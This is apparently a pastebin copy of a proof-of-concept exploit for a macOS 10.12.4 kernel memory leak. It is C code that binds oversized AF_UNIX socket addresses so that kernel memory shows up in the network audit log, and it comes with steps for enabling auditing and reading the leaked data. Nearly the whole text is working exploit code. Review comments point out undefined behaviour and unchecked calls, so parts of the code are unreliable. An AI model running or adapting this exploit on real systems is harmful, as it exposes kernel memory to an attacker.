macOS 10.12.4 0day kernel memory leak PoC

a guest
Apr 22nd, 2017
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/un.h>
  5. #include <unistd.h>
  6. #include <sys/types.h>
  7. #include <sys/socket.h>
  8.  
  9. /*
  10.  
  11. macOS 10.12.4 0day kernel memory leak PoC (see: https://objective-see.com/blog/blog_0x1B.html)
  12. tl;dr Apple 'fixed' a bug by #1 not fixing it, #2 introducing a kernel memory leak ¯\_(ツ)_/¯
  13.  
  14. #1 enable (network) auditing:
  15. a) add 'nt' to /etc/security/audit_control: flags:lo,aa,nt
  16. or
  17. b) read directly off /dev/auditpipe (after configuring it with AUDIT_CLASS_NETWORK)
  18.  
  19. #2 run this program
  20.  
  21. #3 dump the audit log, /var/audit/current, to view leaked kernel memory
  22.  
  23. note: r00t is required for #1 && #3, so impact of this bug is limited
  24.  
  25. */
  26.  
/*
 * Entry point of the PoC. Allocates 100 oversized buffers filled with 0x41,
 * stamps each as a struct sockaddr_un (sun_len = whole buffer, AF_UNIX) and
 * passes each to bind() on a fresh AF_UNIX stream socket. argc/argv are
 * unused. Always returns 0; no library or syscall result is checked.
 *
 * Per the header comment above, the observable effect is outside this
 * process: with network auditing enabled, the audit record written for these
 * bind() calls carries kernel memory it should not. Nothing in main() reads
 * that back or checks whether bind() succeeded.
 */
int main(int argc, char*argv[])
{
    // Make a bunch of sockets. Each iteration leaves one fd open (the
    // socket() result is never closed) and one heap buffer unfreed.
    for(int i=0; i<100; i++)
    {
        // Random size in [128, 255]: arc4random_uniform(128) yields 0..127,
        // so the upper bound is 255, not 256.
        int size = arc4random_uniform(128)+128;

        // Alloc/fill the whole buffer with 'A' (0x41). malloc() is unchecked;
        // on a NULL return the memset below dereferences NULL.
        char* unixSocket = malloc(size);
        memset(unixSocket, 0x41, size);

        // Present the full buffer as the address. sun_len is an unsigned
        // char on BSD-derived systems, so 128..255 fits without truncation.
        // Note that sun_path is never NUL-terminated inside the buffer.
        ((struct sockaddr_un*)unixSocket)->sun_len = size;
        ((struct sockaddr_un*)unixSocket)->sun_family = AF_UNIX;

        // NOTE(review): `socket` here is the socket() library function, not
        // the buffer above. Casting a function to struct sockaddr_un* and
        // reading sun_path through it is undefined behavior, and whatever
        // path bytes result are garbage. Presumably `unixSocket` was meant;
        // even then its sun_path has no terminator (see above) — confirm.
        unlink(((struct sockaddr_un*)socket)->sun_path);
        // bind() with the oversized length; the return value is discarded,
        // so a failing bind() (or a failing socket() returning -1) is silent.
        bind(socket(AF_UNIX, SOCK_STREAM, 0), (struct sockaddr *)unixSocket, size);
    }

    return 0;
}